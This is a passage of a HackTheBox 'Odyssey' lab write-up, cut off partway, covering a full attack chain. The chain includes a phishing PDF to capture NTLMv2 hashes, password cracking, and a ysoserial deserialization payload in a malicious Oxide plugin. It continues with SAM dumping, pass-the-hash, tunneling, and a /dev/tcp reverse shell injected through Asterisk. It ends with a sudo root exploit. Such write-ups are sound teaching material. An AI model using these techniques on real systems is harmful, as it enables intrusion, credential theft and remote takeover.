HackTheBox

Odyssey

Inner Orion Arm

ODYSSEY{k4r3Ful_WI7h_pDf_FiL32}
We start the machine by scanning the ports of the machine with nmap where we find several
open ports, most of which seem to be those of a Windows

❯ nmap 10.13.38.21
Nmap scan report for 10.13.38.21
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
587/tcp open submission
5985/tcp open wsman
28016/tcp open unknown
28083/tcp open unknown
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
The smb port is open, we can see the name of the machine that is online but does not
belong to any domain but is an independent Windows machine

❯ crackmapexec smb 10.13.38.21

SMB 10.13.38.21 445 ONLINE [*] Windows 10.0 Build 17763 x64
(name:ONLINE) (domain:online) (signing:False) (SMBv1:False)
On the main page in the information section they talk about rust servers and mods for oxide
improving performance as well as some images

The first image draws attention and is that in the background, in addition to the cmd running,
we see a shortcut to Adobe Reader 9, so it could be installed
A little further down we find a support email [email protected]

In the following article we show a possible way to obtain a request and an NTLMv2 hash
through a pdf in old versions of Adobe and Foxit, so using BadPDF we can create a
malicious pdf indicating our host and interface.

❯ sudo python2 badpdf.py

______ __ _______ ______ ________

|_ _ \ | ] |_ __ \|_ _ `.|_ __ |
| |_) | ,--. .--.| | ______ | |__) | | | `. \ | |_ \_|
| __'. `'_\ : / /'`' ||______|| ___/ | | | | | _|
_| |__) |// | |,| \__/ | _| |_ _| |_.' /_| |_
|_______/ '-;__/ '.__.;__] |_____| |______.'|_____|
Author : Deepu TV ; Alias DeepZec
 =============================================================

Responder detected :/usr/sbin/responder

Please enter Bad-PDF host IP:
10.10.14.10
Please enter output file name:
test.pdf
Please enter the interface name to listen(Default eth0):
tun0
[*] Starting Process.. [*]
Bad PDF test.pdf created
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
[+] Listening for events...

Since we have an email, through SMTP we can send a phishing email to Invoice attaching
the PDF, encouraging them to open it and send us the request.

❯ swaks --to [email protected] --from [email protected] --header "Subject: Problem on

the server" --server 10.13.38.21 --attach test.pdf
=== Trying 10.13.38.21:25...
=== Connected to 10.13.38.21.
<- 220 ONLINE ESMTP
-> EHLO kali
<- 250-ONLINE
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> MAIL FROM:<[email protected]>
<- 250 OK
-> RCPT TO:<[email protected]>
<- 250 OK
-> DATA
<- 354 OK, send.
-> To: [email protected]
-> From: [email protected]
-> Subject: Problem on the server
-> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
->
-> .
<- 250 Queued (1.168 seconds)
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.
After a few seconds we get an authentication as the user elpenor which translates into
responding to a hash of this user in NTLMv2 format
[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.13.38.21

[SMB] NTLMv2-SSP Username : ONLINE\elpenor
[SMB] NTLMv2-SSP Hash :
elpenor::ONLINE:1122334455667788:76648058671B85ABBFACBA7C04CB33A7:01010000
00000000004DCAC7B5DAD901FDCC4AA06846D3BE000000000200080053004A0030004
70001001E00570049004E002D005100320046004D005200420037004F005900530031000
4003400570049004E002D005100320046004D005200420037004F005900530031002E005
3004A00300047002E004C004F00430041004C000300140053004A00300047002E004C00
4F00430041004C000500140053004A00300047002E004C004F00430041004C0007000800
004DCAC7B5DAD9010600040002000000080030003000000000000000000000000020000
0B77744339FDFDD27F36FF0EA8EDEA82420E687A41F0722354674D948AC7186640A00
10000000000000000000000000000000000009001E0063006900660073002F00310030002
E00310030002E00310034002E0034000000000000000000
However the password is too weak and we managed to crack it using john

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
superman (elpenor)
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
When checking elpenor’s password with crackmapexec we find that it is valid for both the
smb and winrm services since it returns Pwned!

❯ crackmapexec smb 10.13.38.21 -u elpenor -p superman

SMB 10.13.38.21 445 ONLINE [*] Windows 10.0 Build 17763 x64
(name:ONLINE) (domain:ONLINE) (signing:False) (SMBv1:False)
SMB 10.13.38.21 445 ONLINE [+] ONLINE\elpenor:superman

❯ crackmapexec winrm 10.13.38.21 -u elpenor -p superman

SMB 10.13.38.21 5985 ONLINE [*] Windows 10.0 Build 17763
(name:ONLINE) (domain:ONLINE)
HTTP 10.13.38.21 5985 ONLINE [*] http://10.13.38.21:5985/wsman
HTTP 10.13.38.21 5985 ONLINE [+] ONLINE\elpenor:superman (Pwn3d!)
We can simply connect with evil-winrm, get a shell and read the flag

❯ evil-winrm -i 10.13.38.21 -u elpenor -p superman

PS C:\Users\elpenor\Documents> whoami
online\elpenor
PS C:\Users\elpenor\Documents> type ..\Desktop\flag.txt
ODYSSEY{k4r3Ful_WI7h_pDf_FiL32}
PS C:\Users\elpenor\Documents>
Strange quark
ODYSSEY{Ded1CA7eD_rU57_5ERVeR}
Browsing through directories we find one called rustserver, which inside has another called
oxide, which was mentioned to us before in a section of the web
PS C:\rustserver\oxide> dir
Directory: C:\rustserver\oxide
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/14/2021 7:05 AM config
d----- 3/14/2021 7:19 AM data
d----- 3/14/2021 7:05 AM lang
d----- 5/6/2022 2:42 AM logs
d----- 7/24/2021 1:12 PM plugins
-a---- 3/14/2021 7:05 AM 431 oxide.config.json
PS C:\rustserver\oxide>
Interestingly, in the plugins directory we can write so we could upload a plugin written in C#
using the documentation to create it.
PS C:\rustserver\oxide\plugins> icacls .
. BUILTIN\Users:(OI)(CI)(W)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
PS C:\rustserver\oxide\plugins>
To take advantage of this we will create a serialized data in base64 that creates a pwned
user who is an administrator, for this we will use ysoserial indicating the BynaryFormatter
format that we will use, in addition to the fact that we want it in base64
PS C:\CTF\ysoserial> .\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o
base64 -c "net user pwned password123# /add && net localgroup Administrators pwned
/add"
AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3Vsd
HVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACE
AVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3Rya
W5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1Ym
xpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHV
mVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYX
Jpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAu
MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5
XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbn
MuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3Jsa
WIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1
iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdG
VTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAE8vYyBuZXQgdX
NlciBwd25lZCBwYXNzd29yZDEyMyMgL2FkZCAmJiBuZXQgbG9jYWxncm91cCBBZG1pbm
lzdHJhdG9ycyBwd25lZCAvYWRkBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2Vy
aWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDM
FN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0
ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uU
mVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCQ
AAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGV
FbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5Dn
RhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3l
zdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgoAAACwAl
N5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC
4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA
4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR
1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3
RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3V
sdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GCwA
AAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY
0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBgwAAABJU3lzdGVtLCBWZXJzaW9uPTQ
uMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM
0ZTA4OQYNAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg4AAAAFU3RhcnQJDw
AAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uS
G9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ
25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLl
R5cGVbXQkOAAAACQwAAAAJDQAAAAYTAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9j
ZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhQAAAA+U3lzdGVtLk
RpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZy
kIAAAACgEPAAAACAAAAAkKAAAACQsAAAAKCQwAAAAJDQAAAAkOAAAACgs=
PS C:\CTF\ysoserial>
Based on the example in the documentation we can create a simple code in C# that
interprets our serialized data through the BinaryFormatter object
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

namespace Oxide.Plugins
{
[Info("Epic Stuff", "Unknown Author", "0.1.0")]
[Description("Makes epic stuff happen")]
class EpicStuff : CovalencePlugin
{
private void Init()
{
byte[] payload =
Convert.FromBase64String("AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNp
b249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1
NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNld
GAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0d
XJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAF
Q291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbn
MuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3Jsa
WIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1
iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTe
XN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdG
VtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsL
CBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAy
JTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAA
AAGBgAAAE8vYyBuZXQgdXNlciBwd25lZCBwYXNzd29yZDEyMyMgL2FkZCAmJiBuZXQg
bG9jYWxncm91cCBBZG1pbmlzdHJhdG9ycyBwd25lZCAvYWRkBgcAAAADY21kBAUAAAA
iU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0
aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRG
VsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphd
GlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhv
bGRlcgkIAAAACQkAAAAJCQAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRp
b25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFy
Z2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdG
VFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxl
Z2F0ZUVudHJ5BgoAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29yb
GliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZ
W49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJza
W9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjN
TYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcn
Npb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNW
M1NjE5MzRlMDg5XV0GCwAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJl
PW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBgwAAABJU3l
zdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG
9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYNAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXN
zBg4AAAAFU3RhcnQJDwAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm
9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05h
bWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzA
QEBAQEAAwgNU3lzdGVtLlR5cGVbXQkOAAAACQwAAAAJDQAAAAYTAAAAPlN5c3RlbS
5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpb
mcpBhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cml
uZywgU3lzdGVtLlN0cmluZykIAAAACgEPAAAACAAAAAkKAAAACQsAAAAKCQwAAAAJD
QAAAAkOAAAACgs=");
BinaryFormatter formatter = new BinaryFormatter();
Stream stream = new MemoryStream(payload);
object obj = formatter.Deserialize(stream);
}
}
}
We simply have to upload the .cs file to the Oxide plugins directory and wait for it to run, we
can upload it using the evil-winrm upload function
PS C:\rustserver\oxide\plugins> upload EpicStuff.cs

Info: Uploading EpicStuff.cs to C:\rustserver\oxide\plugins\EpicStuff.cs

Data: 4352 bytes of 4352 bytes copied

Info: Upload successful!

PS C:\rustserver\oxide\plugins>
After a few seconds the plugin is loaded and our payload is interpreted, and consequently
the user pwned is created which belongs to the Administrators group.
PS C:\rustserver\oxide\plugins> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount elpenor
Guest pwned sshd
WDAGUtilityAccount
The command completed with one or more errors.
PS C:\rustserver\oxide\plugins> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the
computer/domain
Members
-------------------------------------------------------------------------------
Administrator
pwned
The command completed successfully.
PS C:\rustserver\oxide\plugins>
Since the user is an administrator it returns a Pwn3d! in crackmapexec so we can dump the
sam and see all the users’ NT hashes

❯ crackmapexec smb 10.13.38.21 -u pwned -p password123#

SMB 10.13.38.21 445 ONLINE [*] Windows 10.0 Build 17763 x64
(name:ONLINE) (domain:ONLINE) (signing:False) (SMBv1:False)
SMB 10.13.38.21 445 ONLINE [+] ONLINE\pwned:password123# (Pwn3d!)

❯ crackmapexec smb 10.13.38.21 -u pwned -p password123# --sam

SMB 10.13.38.21 445 ONLINE [*] Windows 10.0 Build 17763 x64
(name:ONLINE) (domain:ONLINE) (signing:False) (SMBv1:False)
SMB 10.13.38.21 445 ONLINE [+] ONLINE\pwned:password123# (Pwn3d!)
SMB 10.13.38.21 445 ONLINE [*] Dumping SAM hashes
SMB 10.13.38.21 445 ONLINE
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c606623dc66bad2c670d402d4a
33d2b7:::
SMB 10.13.38.21 445 ONLINE
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::
:
SMB 10.13.38.21 445 ONLINE
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e
0c089c0:::
SMB 10.13.38.21 445 ONLINE
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b2aee3361c843009143b
e1a935d8db9b:::
SMB 10.13.38.21 445 ONLINE
elpenor:1001:aad3b435b51404eeaad3b435b51404ee:72f5cfa80f07819ccbcfb72feb9eb9b7::
:
SMB 10.13.38.21 445 ONLINE
sshd:1002:aad3b435b51404eeaad3b435b51404ee:696df4f224281d855e7716d56acc2bc8:::
SMB 10.13.38.21 445 ONLINE
pwned:1003:aad3b435b51404eeaad3b435b51
We can simply connect with evil-winrm, get a shell and read the flag

❯ evil-winrm -i 10.13.38.21 -u Administrator -H c606623dc66bad2c670d402d4a33d2b7

PS C:\Users\Administrator\Documents> whoami
online\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
ODYSSEY{Ded1CA7eD_rU57_5ERVeR}
PS C:\Users\Administrator\Documents>
Entanglement
ODYSSEY{THE_tElEPH0Ne_4_New_M4cHINe}
When doing an ipconfig we realize that we have another network interface in which our IPv4
address is 192.168.21.10 but there may be more devices
PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::17
IPv6 Address. . . . . . . . . . . : dead:beef::a04b:6d7c:3355:828d
Link-local IPv6 Address . . . . . : fe80::a04b:6d7c:3355:828d%6
IPv4 Address. . . . . . . . . . . : 10.13.38.21
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:deb9%6
10.13.38.2
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::1521:9a68:91c:f431%4
IPv4 Address. . . . . . . . . . . : 192.168.21.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.21.2
PS C:\Users\Administrator\Documents>
To have a connection from our computer we can use ligolo-ng using the agent to connect to
our computer through port 11601 that the proxy marks for us.
PS C:\Users\Administrator\Documents> upload agent.exe
Info: Uploading agent.exe to C:\Users\Administrator\Documents\agent.exe
Data: 6460072 bytes of 6460072 bytes copied
Info: Upload successful!
PS C:\Users\Administrator\Documents> .\agent.exe -connect 10.10.14.10:11601 -ignore-cert
In the proxy we get a session, we indicate it and start the tunnel with start

❯ ./proxy -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!

ligolo-ng »
INFO[0051] Agent joined. name="ONLINE\\Administrator@online"
remote="10.13.38.21:49679"
ligolo-ng » session
? Specify a session : 1 - ONLINE\Administrator@online - 10.13.38.21:49679
[Agent : ONLINE\Administrator@online] » start
INFO[0062] Starting tunnel to ONLINE\Administrator@online
[Agent : ONLINE\Administrator@online] »
We added the segment 192.168.21.0/24 to the ligolo interface and now we have a
connection with all the equipment on the interface, we can check it with a ping

❯ sudo ip route add 192.168.21.0/24 dev ligolo

❯ ping -c1 -w1 192.168.21.10

PING 192.168.21.10 (192.168.21.10) 56(84) bytes of data.
64 bytes from 192.168.21.10: icmp_seq=1 ttl=64 time=167 ms
--- 192.168.21.10 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 167.279/167.279/167.279/0.000 ms
Through ping we managed to find another 3 active hosts, we can scan the ports with nmap
of these, from host .11 to .13 of this interface

❯ nmap 192.168.21.11-13
Nmap scan report for 192.168.21.11
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
3000/tcp open ppp
Nmap scan report for 192.168.21.12
PORT STATE SERVICE
3000/tcp open ppp
5039/tcp open unknown
8080/tcp open http-proxy
25000/tcp open icl-twobase1
Nmap scan report for 192.168.21.13
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
Let’s start with the .12 web on port 8080 which simply runs gogs

We know the existence of a user called elpenor, when checking if he has an account in gogs
it appears as existing and shows us a public repository

The repository is the source code for a rocket chat bot that runs on the 3000
We can also see all the public activity of the user elpenor, such as commits

In one of the commits we find a link which takes you to an invitation record where if a user
enters they can register in rocket chat
We enter the link that they share with us and register any user, as a test where we get
access to a rocket chat where there is a forum called general
Another interesting thing is that in the problems elpenor requests the creation of a voip
server, and asks that it be passed to aeolus with the syntax ip <ip address>
With netsh we redirect all incoming traffic from port 5038 where voip listens to our host so
we can receive the request from our machine
PS C:\Users\Administrator\Documents> netsh interface portproxy add v4tov4
listenaddress=0.0.0.0 listenport=5038 connectaddress=10.10.14.10 connectport=5038
PS C:\Users\Administrator\Documents>
We send the IP 192.168.21.10 which is the one of Windows to the bot aeolus in the chat and
on our attacking machine we receive the request, which only tries to authenticate

Since we receive the authentication we intercept the credentials of this

❯ netcat -lvnp 5038

Listening on 0.0.0.0 5038
Connection received on 10.13.38.21
Action: login
Username: aeolus
Secret: P7xJ6y6x
ActionID: __auth_1693366373541__
Port 5038 of the machine is closed but 5039 is open which is ssl, we can create a
commands.txt file with the authentication that was performed
Action: login
Username: aeolus
Secret: P7xJ6y6x
Now we connect to port 5039 of the machine with openssl and send the content of
commands.txt as input, we receive an Authentication accepted

❯ cat commands.txt | openssl s_client -quiet -connect 192.168.21.12:5039

Response: Success
Message: Authentication accepted
Event: FullyBooted
Privilege: system,all
Uptime: 4251
LastReload: 4251
Status: Fully Booted
We carry out the same process but this time we add a help as a command
Action: login
Username: aeolus
Secret: P7xJ6y6x
Action: command
Command: help
We found several functions, including dialplan add extension that we will add to the
commands.txt file to see the syntax that is needed to be able to use iAction: login
Username: aeolus
Secret: P7xJ6y6x
Action: command
Command: dialplan add extension
In the privileges we find system,all which is what we can use, we can also see the
arguments that this function needs to run.

❯ cat commands.txt | openssl s_client -quiet -connect 192.168.21.12:5039

Response: Success
Message: Authentication accepted
Event: FullyBooted
Privilege: system,all
Uptime: 4356
LastReload: 4356
Status: Fully Booted
Response: Error
Message: Command output follows
Output: Usage: dialplan add extension <exten>,<priority>,<app> into <context> [replace]
Output:
Output: app can be either:
Output: app-name
Output: app-name(app-data)
Output: app-name,<app-data>
Output:
Output: This command will add the new extension into <context>. If
Output: an extension with the same priority already exists and the
Output: 'replace' option is given we will replace the extension.
Output:
Output: Example: dialplan add extension 6123,1,Dial,IAX/216.207.245.56/6123 into local
Output: Now, you can dial 6123 and talk to Markster :)
We can use system, but in order to send a shell we will encode in base64 a classic oneliner
in bash that will send it to .10 on port 4444

❯ echo 'bash -c "bash -i >& /dev/tcp/192.168.21.10/4444 0>&1"' | base64

YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjEwLzQ0NDQgMD4mM
SIK
Now we will create the test extension under the pwned context that will be in charge of
executing our payload with system, followed by calling the test extension
Action: login
Username: aeolus
Secret: P7xJ6y6x
Action: command
Command: dialplan add extension test,1,system(echo\
YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjEwLzQ0NDQgMD4mM
SIK|base64\ -d|bash), into pwned replace
Action: command
Command: originate local/test@pwned extension test@pwned
In Windows we redirect the traffic that enters through port 4444 to our host
PS C:\Users\Administrator\Documents> netsh interface portproxy add v4tov4
listenaddress=192.168.21.10 listenport=4444 connectaddress=10.10.14.10
connectport=4444
PS C:\Users\Administrator\Documents>
Finally we send the commands to voip and when the payload is interpreted with system we
receive a shell as the asterisk user in .12 where we can read the flag

❯ cat commands.txt | openssl s_client -quiet -connect 192.168.21.12:5039

❯ netcat -lvnp 4444

Listening on 0.0.0.0 4444
Connection received on 10.13.38.21
asterisk@odyssey:~$ id
uid=112(asterisk) gid=117(asterisk) groups=117(asterisk)
asterisk@odyssey:~$ hostname -I
192.168.21.12 172.17.0.1 10.1.148.128
asterisk@odyssey:~$ cat /opt/flag.txt
ODYSSEY{THE_tElEPH0Ne_4_New_M4cHINe}
asterisk@odyssey:~$
Can you see a singularity?
ODYSSEY{W3_4LL_4r3_p4r7_Of_4_cluS73R}
Looking at the sudo version we find 1.38.1, which is a bit old.
asterisk@odyssey:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
asterisk@odyssey:~$
Searching for exploits we found CVE-2021–3156 which takes advantage of this, we simply
copy the exploit and when we run it we gain a shell as root
asterisk@odyssey:~$ python3 exploit_nss.py
# whoami
root
# hostname -I
192.168.21.12 172.17.0.1 10.1.148.128
# cat /root/flag.txt
ODYSSEY{W3_4LL_4r3_p4r7_Of_4_cluS73R}
#
Zero Entropy
ODYSSEY{JUL14_d353R14L124710n}
In the /opt directory we find another .git called apikey_beta from the gogs repositories that
belongs to elpenor, we will copy it to a directory inside /tmp
root@odyssey:/opt/git/gogs-repositories/elpenor# ls -l
drwxr-xr-x 7 asterisk root 4096 Mar 25 2021 apikey_beta.git
drwxr-xr-x 7 asterisk root 4096 Feb 28 2021 rocketchat_bot.git
root@odyssey:/opt/git/gogs-repositories/elpenor# mkdir /tmp/otros
root@odyssey:/opt/git/gogs-repositories/elpenor# cp -r apikey_beta.git /tmp/otros/.git
root@odyssey:/opt/git/gogs-repositories/elpenor#
If we try to see the status it asks us to do it on a branch, after removing the bare
configuration we can run it again and see the status
root@odyssey:/tmp/otros# git status
